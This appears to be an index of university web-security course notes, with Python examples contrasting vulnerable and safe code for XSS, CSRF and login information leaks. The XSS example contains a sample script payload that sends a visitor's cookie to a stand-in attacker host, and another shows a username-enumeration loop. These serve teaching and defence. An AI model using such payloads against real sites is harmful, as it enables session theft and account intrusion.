Polimi CS Notes

Web security

Pages

Introduction to web security
Web applications are built on top of HTTP, which is a stateless protocol that has only weak authentication built in. State and authentication are emulated by the application; they are not embedded in…
Cross Site Scripting (XSS)
Cross-site scripting is a vulnerability by means of which client-side code can be injected into a page. For example, suppose we have a blog app which lets users post anything they want. A malicious user…
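The blog scenario above, as an added example (not code from the notes): two renderers for a user post, one that concatenates the raw body into the page and one that HTML-encodes it first. The posts, including the cookie-stealing payload and the attacker host in it, are constructed for the demo.

```python
import html

# Constructed sample posts: a benign one and one carrying a script payload
# that would ship every visitor's cookie to an attacker-controlled host.
POSTS = [
    "Great lecture today!",
    "<script>document.location='http://attacker.example/?c='+document.cookie</script>",
]


def render_post_vulnerable(body: str) -> str:
    """Builds the post's HTML by string concatenation, with no escaping.
    Whatever the user typed is emitted as markup, so a <script> tag in a
    stored post runs in the browser of everyone who views the page."""
    return '<div class="post">' + body + "</div>"


def render_post_safe(body: str) -> str:
    """HTML-encodes the body before embedding it as element content:
    '<' becomes '&lt;', '"' becomes '&quot;', so the browser shows the
    payload as text instead of executing it."""
    return '<div class="post">' + html.escape(body, quote=True) + "</div>"


def contains_script_tag(rendered: str) -> bool:
    """Crude check used only to make the difference between the two
    renderers visible: does the output still contain a live <script> tag?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    for post in POSTS:
        print("vulnerable:", render_post_vulnerable(post))
        print("safe      :", render_post_safe(post))
```

Note that `html.escape` is the right encoding only for element content and quoted attribute values; data placed inside a `<script>` block, a URL, or an inline event handler needs the encoding for that context, and the safest option is to avoid those placements altogether.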
SQL injection
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they…
Cookies and sessions
HTTP is stateless and almost unidirectional. Web applications, on the other hand, need to keep state. Cookies are client-side information storage, a reliable mechanism to keep stateful information…
Cross-Site Request Forgery (CSRF)
Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. It allows an attacker to…
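One added example (not code from the notes) covering both the "Cookies and sessions" and the CSRF entries: a server-side session store keyed by a random cookie value, the `Set-Cookie` line that issues it, and a state-changing handler shown once trusting the cookie alone and once also requiring a per-session anti-CSRF token. The session structure, the handler names and the "complaint" action are assumptions made for the demo.

```python
import hmac
import secrets

# Server-side session store. The cookie carries only an opaque random id;
# the actual state (user, CSRF token) never leaves the server.
SESSIONS: dict[str, dict] = {}


def create_session(username: str) -> tuple[str, str]:
    """Logs a user in: allocates a random session id and a random CSRF token
    bound to that session. Returns (session_id, Set-Cookie header line)."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": username, "csrf": secrets.token_urlsafe(32)}
    # HttpOnly: not readable from script (limits XSS cookie theft).
    # Secure: sent only over HTTPS. SameSite=Lax: not attached to
    # cross-site POSTs by modern browsers, a first line of CSRF defence.
    header = f"Set-Cookie: session={sid}; HttpOnly; Secure; SameSite=Lax; Path=/"
    return sid, header


def csrf_token_for(sid: str) -> str:
    """The token the server embeds as a hidden field in its own forms."""
    return SESSIONS[sid]["csrf"]


def handle_post_vulnerable(sid: str, form: dict) -> str:
    """Trusts the session cookie alone. A form auto-submitted from an
    attacker's page carries the victim's cookie, so the action goes through."""
    if sid not in SESSIONS:
        return "401 not logged in"
    return f"200 complaint filed by {SESSIONS[sid]['user']}"


def handle_post_safe(sid: str, form: dict) -> str:
    """Also requires the per-session token in the request body. The
    attacker's page can make the browser send the cookie but cannot read
    the token out of the legitimate form (same-origin policy)."""
    if sid not in SESSIONS:
        return "401 not logged in"
    expected = SESSIONS[sid]["csrf"]
    supplied = form.get("csrf_token", "")
    # Constant-time comparison so the check itself does not leak the token.
    if not hmac.compare_digest(expected, supplied):
        return "403 csrf token missing or wrong"
    return f"200 complaint filed by {SESSIONS[sid]['user']}"


if __name__ == "__main__":
    sid, header = create_session("alice")
    print(header)
    forged = {"text": "the exam was unfair"}          # what a cross-site form sends
    legit = {**forged, "csrf_token": csrf_token_for(sid)}
    print(handle_post_vulnerable(sid, forged))        # 200
    print(handle_post_safe(sid, forged))              # 403
    print(handle_post_safe(sid, legit))               # 200
```

The token is a defence in depth on top of `SameSite`: it also covers browsers or flows where the cookie is still attached cross-site, and it is what the server can check without relying on client behaviour.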
Other vulnerabilities
Freudian slips (information leaks): detailed error messages, displaying user-supplied data in errors, side-channels (e.g. "user not found" vs "password mismatch"), debug in production, URL parameter…
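The "user not found" vs "password mismatch" side-channel, as an added example (not from the notes): a login that reports which check failed, the same login with a uniform response, and the username-enumeration loop an attacker would run against each. The user table is constructed; passwords are stored as plain SHA-256 digests only to keep the demo short (a real application uses a slow, salted password hash).

```python
import hashlib
import hmac


def _digest(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


# Constructed user table.
USERS = {"alice": _digest("s3cret"), "bob": _digest("hunter2")}
# Digest compared against when the user does not exist, so the unknown-user
# path does the same amount of work as the known-user path.
DUMMY_DIGEST = _digest("placeholder")


def login_leaky(username: str, password: str) -> str:
    """Different message for each failure cause: the response tells the
    client whether the username exists."""
    if username not in USERS:
        return "user not found"
    if not hmac.compare_digest(USERS[username], _digest(password)):
        return "password mismatch"
    return "ok"


def login_uniform(username: str, password: str) -> str:
    """One message for both failure causes. The digest is computed and
    compared even for unknown users so the timing stays similar too."""
    stored = USERS.get(username, DUMMY_DIGEST)
    password_ok = hmac.compare_digest(stored, _digest(password))
    if username not in USERS or not password_ok:
        return "invalid credentials"
    return "ok"


def enumerate_users(login, candidates: list[str]) -> list[str]:
    """What the attacker does with the leak: try a junk password for each
    candidate and keep the names whose response differs from the response
    for a name that certainly does not exist."""
    baseline = login("zzz-no-such-user", "wrong")
    return [name for name in candidates if login(name, "wrong") != baseline]


if __name__ == "__main__":
    candidates = ["alice", "carol", "bob", "dave"]
    print(enumerate_users(login_leaky, candidates))    # ['alice', 'bob']
    print(enumerate_users(login_uniform, candidates))  # []
```

The same reasoning applies to the other items in the list: a detailed stack trace or an echoed query fragment tells the attacker which table, framework or code path they are hitting, which is exactly the information they need to turn a guess into a working payload.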
Exercises on web security
2021-2022 Demo exam exercise 4 (6 points) LetsComplain is a new website for students and profs. Students here can complain about exams and professors can handle the complaints and register their…